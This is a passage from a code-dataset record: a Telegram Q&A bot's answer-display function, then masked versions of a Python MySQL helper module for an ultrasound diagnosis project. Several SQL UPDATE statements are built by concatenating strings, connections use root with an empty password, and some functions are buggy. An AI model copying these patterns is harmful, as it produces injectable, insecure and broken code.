showkey = showmore\n else:\n showkey = showless\n if receiver_tel_id == question_owner:\n if accepted_answer:\n keyboard.add(showkey)\n else:\n keyboard.add(showkey, accept_answer, next_page_answer)\n else:\n keyboard.add(showkey)\n elif receiver_tel_id == question_owner:\n if not accepted_answer:\n if question_owner == receiver_tel_id:\n keyboard.add(accept_answer, next_page_answer)\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n if role in ['STUDENT', 'TA']:\n if accepted_answer:\n answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(\n question_id) + ' #' + str(answer_owner\n ) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:high_voltage: Rated: {0}/5\"\"\".format(rate_answer))\n else:\n answer = emoji.emojize(':bright_button: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer\n if role == 'TA':\n answer += emoji.emojize('\\n\\n:bust_in_silhouette: Sent by '\n ) + role\n elif role in ['ADMIN']:\n question_state = cur.execute(\n 'SELECT status FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n keyboard = telebot.types.InlineKeyboardMarkup()\n if short_message_flag:\n if short:\n showkey = showmore\n else:\n showkey = showless\n keyboard.add(showkey)\n else:\n keyboard = None\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n answer = emoji.emojize(':collision: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:bust_in_silhouette: Sent by \"\"\") + role\n return answer, keyboard\n",
"step-3": "from keyboards import *\nfrom DB import cur, conn\nfrom bot_token import bot\nfrom limit_text import limit_text\n\n\ndef send_answer(question_id, answer_owner, receiver_tel_id, short):\n answer = cur.execute(\n 'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'\n , (question_id, answer_owner)).fetchone()\n keyboard = telebot.types.InlineKeyboardMarkup()\n if answer is not None:\n (id, question_id, tel_id, answer, accepted_answer, rate_answer,\n photo, document, document_type, document_size, send_date) = (cur\n .execute(\n 'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',\n (question_id, answer_owner)).fetchone())\n question_owner = cur.execute(\n 'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (\n answer_owner,)).fetchone()[0]\n short_message_flag = False\n if limit_text(answer):\n short_message_flag = True\n if short:\n answer = limit_text(answer)\n showkey = showmore\n else:\n showkey = showless\n if receiver_tel_id == question_owner:\n if accepted_answer:\n keyboard.add(showkey)\n else:\n keyboard.add(showkey, accept_answer, next_page_answer)\n else:\n keyboard.add(showkey)\n elif receiver_tel_id == question_owner:\n if not accepted_answer:\n if question_owner == receiver_tel_id:\n keyboard.add(accept_answer, next_page_answer)\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n if role in ['STUDENT', 'TA']:\n if accepted_answer:\n answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(\n question_id) + ' #' + str(answer_owner\n ) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:high_voltage: Rated: {0}/5\"\"\".format(rate_answer))\n else:\n answer = emoji.emojize(':bright_button: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer\n if role == 'TA':\n answer += emoji.emojize('\\n\\n:bust_in_silhouette: Sent by '\n ) + role\n elif role in ['ADMIN']:\n question_state = cur.execute(\n 'SELECT status FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n keyboard = telebot.types.InlineKeyboardMarkup()\n if short_message_flag:\n if short:\n showkey = showmore\n else:\n showkey = showless\n keyboard.add(showkey)\n else:\n keyboard = None\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n answer = emoji.emojize(':collision: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:bust_in_silhouette: Sent by \"\"\") + role\n return answer, keyboard\n",
"step-4": "from keyboards import *\nfrom DB import cur, conn\nfrom bot_token import bot\nfrom limit_text import limit_text\n\ndef send_answer(question_id, answer_owner, receiver_tel_id, short):\n\n answer = cur.execute('''SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''', (question_id, answer_owner)).fetchone()\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n if answer is not None:\n id, question_id, tel_id, answer, accepted_answer, rate_answer, photo, document, document_type, document_size, send_date = cur.execute(\n '''SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''',\n (question_id, answer_owner)).fetchone()\n\n question_owner = \\\n cur.execute('''SELECT tel_id FROM Questions WHERE id = (%s)''', (question_id, )).fetchone()[0]\n # Limiting Long Questions and specifying keyboard accordingly\n\n # GETTING ADMINS AND TAs\n role = cur.execute('''SELECT role FROM Users WHERE tel_id = (%s)''', (answer_owner, )).fetchone()[0]\n\n # This flag is used at the bottom for Admin and TAs keyboard setting\n short_message_flag = False\n # Setting keyboard\n if limit_text(answer):\n short_message_flag = True\n # SHOWMORE key\n if short:\n answer = limit_text(answer)\n showkey = showmore\n else:\n showkey = showless\n\n if receiver_tel_id == question_owner:\n if accepted_answer:\n keyboard.add(showkey)\n else:\n keyboard.add(showkey, accept_answer, next_page_answer)\n else:\n # FOLLOWERs and Answer Owner only get a show more key\n keyboard.add(showkey)\n else:\n if receiver_tel_id == question_owner:\n if not accepted_answer:\n if question_owner == receiver_tel_id:\n keyboard.add(accept_answer, next_page_answer)\n\n # ATTACHMENTs\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'\n .format(document_type, document_size)), callback_data='document')\n keyboard.add(document_button)\n\n # SETTING EMOJI BASED ON ACCEPTED OR NOT ACCEPTED ANSWER\n if role in ['STUDENT', 'TA']:\n if accepted_answer:\n answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(question_id) + ' #' + \\\n str(answer_owner) + '\\n\\n' + answer + emoji.emojize('\\n\\n:high_voltage: Rated: {0}/5'.format(rate_answer))\n\n else:\n answer = emoji.emojize(':bright_button: #A_') + str(question_id) + ' #' + str(answer_owner) + '\\n\\n' + answer\n\n if role == 'TA':\n answer += emoji.emojize('\\n\\n:bust_in_silhouette: Sent by ') + role\n\n ## ADMINs AND TAs answers are indicated with a flag\n elif role in ['ADMIN']:\n question_state = cur.execute('''SELECT status FROM Questions WHERE id = (%s)''', (question_id,)).fetchone()[0]\n\n # ADMIN Answers are different\n keyboard = telebot.types.InlineKeyboardMarkup()\n if short_message_flag:\n # SHOWMORE key\n if short:\n showkey = showmore\n else:\n showkey = showless\n\n keyboard.add(showkey)\n else:\n keyboard = None\n\n # ATTACHMENTs\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n\n answer = emoji.emojize(':collision: #A_') + str(question_id) + ' #' + str(answer_owner) + '\\n\\n' \\\n + answer + emoji.emojize('\\n\\n:bust_in_silhouette: Sent by ') + role\n\n # Returning Answer and Two Keyboards\n return (answer, keyboard)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def saveData(data, label, filename):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_' + filename
with open(
'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/'
+ filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = ("UPDATE pasien SET hasilproses = '" + filename_hasil +
"',label = '" + str(label[0]) + "' WHERE id = " + str(id_pasien))
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def readData():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor = connection.cursor()
cursor.execute(sql_select_Query)
records = cursor.fetchall()
data = records[0]
filename = data[2]
dataSignal = []
my_file = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +
filename, 'r')
for line in my_file.readlines():
if line[-1:] == '\n':
dataSignal.append(line[:-1])
else:
dataSignal.append(line)
my_file.close()
if connection.is_connected():
cursor.close()
connection.close()
return dataSignal, filename
def saveData(data, label, filename):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_' + filename
with open(
'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/'
+ filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = ("UPDATE pasien SET hasilproses = '" + filename_hasil +
"',label = '" + str(label[0]) + "' WHERE id = " + str(id_pasien))
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
import numpy as np
import mysql.connector
from mysql.connector import Error
import matplotlib.pyplot as plt
def readData():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor = connection.cursor()
cursor.execute(sql_select_Query)
records = cursor.fetchall()
data = records[0]
filename = data[2]
dataSignal = []
my_file = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +
filename, 'r')
for line in my_file.readlines():
if line[-1:] == '\n':
dataSignal.append(line[:-1])
else:
dataSignal.append(line)
my_file.close()
if connection.is_connected():
cursor.close()
connection.close()
return dataSignal, filename
def saveData(data, label, filename):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_' + filename
with open(
'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/'
+ filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = ("UPDATE pasien SET hasilproses = '" + filename_hasil +
"',label = '" + str(label[0]) + "' WHERE id = " + str(id_pasien))
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
import numpy as np
import mysql.connector
from mysql.connector import Error
import matplotlib.pyplot as plt
def readData():
connection = mysql.connector.connect(host='localhost',database='cad_ultrasound',user='root',password='')
sql_select_Query = "SELECT id_pasien,nama,pathdata FROM datasets"
cursor = connection.cursor()
cursor.execute(sql_select_Query)
records = cursor.fetchall()
data = records[0]
# nama_pasien = data[1]
filename = data[2]
# dataSignal = np.genfromtxt(r"C:/xampp/htdocs/projectCAD/storage/app/public/upload/files/"+filename,delimiter=',')
## READ TXT FILE
dataSignal = []
my_file = open("C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/" + filename, "r")
for line in my_file.readlines():
if line[-1:] == "\n":
dataSignal.append(line[:-1])
else:
dataSignal.append(line)
my_file.close()
# C:/xampp/htdocs/projectCAD/public/storage/upload/files/hasilproses
if (connection.is_connected()):
cursor.close()
connection.close()
return dataSignal, filename
def saveData(data,label,filename):
connection = mysql.connector.connect(host='localhost', database='cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_'+filename
with open(r'C:\xampp\htdocs\projectCAD\public\storage\upload/files\hasilproses/' + filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
#Select Pasien from database
sql_select = "SELECT id_pasien,nama,pathdata FROM datasets"
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = "UPDATE pasien SET hasilproses = '" + filename_hasil + "',label = '"+str(label[0])+"' WHERE id = "+str(id_pasien)
cursor.execute(sql_update)
connection.commit()
if (connection.is_connected()):
cursor.close()
connection.close()
return print("sukses")
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost',
database='cad_ultrasound',
user='root',
password='')
cursor = connection.cursor()
sql_select_Query = "SELECT id_pasien,nama,pathdata FROM datasets"
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(r"C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/" + fiturname, delimiter=',')
if (connection.is_connected()):
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur,label):
connection = mysql.connector.connect(host='localhost',
database='cad_ultrasound',
user='root',
password='')
cursor = connection.cursor()
# dbfitur = getFiturEkstraksi()
# dbfitur.append(fitur)
fiturname = 'fitur.txt'
rowfitur = open("C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/"+fiturname, "w")
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open("C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/"+labelname, "w")
for row in range(len(label)):
np.savetxt(rowlabel,row)
rowlabel.close()
sql_update = "UPDATE fitur_ekstraksis SET fitur = '" + fiturname + "', label = '" + labelname + "' WHERE id = 1"
cursor.execute(sql_update)
connection.commit()
if (connection.is_connected()):
cursor.close()
connection.close()
return print("sukses")
|
flexible
|
{
"blob_id": "4d7696c832f9255fbc68040b61fde12e057c06fa",
"index": 3899,
"step-1": "<mask token>\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-2": "<mask token>\n\n\ndef saveData(data, label, filename):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n filename_hasil = 'hasilproses_' + filename\n with open(\n 'C:\\\\xampp\\\\htdocs\\\\projectCAD\\\\public\\\\storage\\\\upload/files\\\\hasilproses/'\n + filename_hasil, 'w') as f:\n for row in data:\n f.write(str(row) + '\\n')\n f.close()\n sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select)\n records = cursor.fetchall()\n data = records[0]\n id_pasien = data[0]\n print(label[0])\n sql_update = (\"UPDATE pasien SET hasilproses = '\" + filename_hasil +\n \"',label = '\" + str(label[0]) + \"' WHERE id = \" + str(id_pasien))\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-3": "<mask token>\n\n\ndef readData():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor = connection.cursor()\n cursor.execute(sql_select_Query)\n records = cursor.fetchall()\n data = records[0]\n filename = data[2]\n dataSignal = []\n my_file = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +\n filename, 'r')\n for line in my_file.readlines():\n if line[-1:] == '\\n':\n dataSignal.append(line[:-1])\n else:\n dataSignal.append(line)\n my_file.close()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return dataSignal, filename\n\n\ndef saveData(data, label, filename):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n filename_hasil = 'hasilproses_' + filename\n with open(\n 'C:\\\\xampp\\\\htdocs\\\\projectCAD\\\\public\\\\storage\\\\upload/files\\\\hasilproses/'\n + filename_hasil, 'w') as f:\n for row in data:\n f.write(str(row) + '\\n')\n f.close()\n sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select)\n records = cursor.fetchall()\n data = records[0]\n id_pasien = data[0]\n print(label[0])\n sql_update = (\"UPDATE pasien SET hasilproses = '\" + filename_hasil +\n \"',label = '\" + str(label[0]) + \"' WHERE id = \" + str(id_pasien))\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-4": "import numpy as np\nimport mysql.connector\nfrom mysql.connector import Error\nimport matplotlib.pyplot as plt\n\n\ndef readData():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor = connection.cursor()\n cursor.execute(sql_select_Query)\n records = cursor.fetchall()\n data = records[0]\n filename = data[2]\n dataSignal = []\n my_file = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +\n filename, 'r')\n for line in my_file.readlines():\n if line[-1:] == '\\n':\n dataSignal.append(line[:-1])\n else:\n dataSignal.append(line)\n my_file.close()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return dataSignal, filename\n\n\ndef saveData(data, label, filename):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n filename_hasil = 'hasilproses_' + filename\n with open(\n 'C:\\\\xampp\\\\htdocs\\\\projectCAD\\\\public\\\\storage\\\\upload/files\\\\hasilproses/'\n + filename_hasil, 'w') as f:\n for row in data:\n f.write(str(row) + '\\n')\n f.close()\n sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select)\n records = cursor.fetchall()\n data = records[0]\n id_pasien = data[0]\n print(label[0])\n sql_update = (\"UPDATE pasien SET hasilproses = '\" + filename_hasil +\n \"',label = '\" + str(label[0]) + \"' WHERE id = \" + str(id_pasien))\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
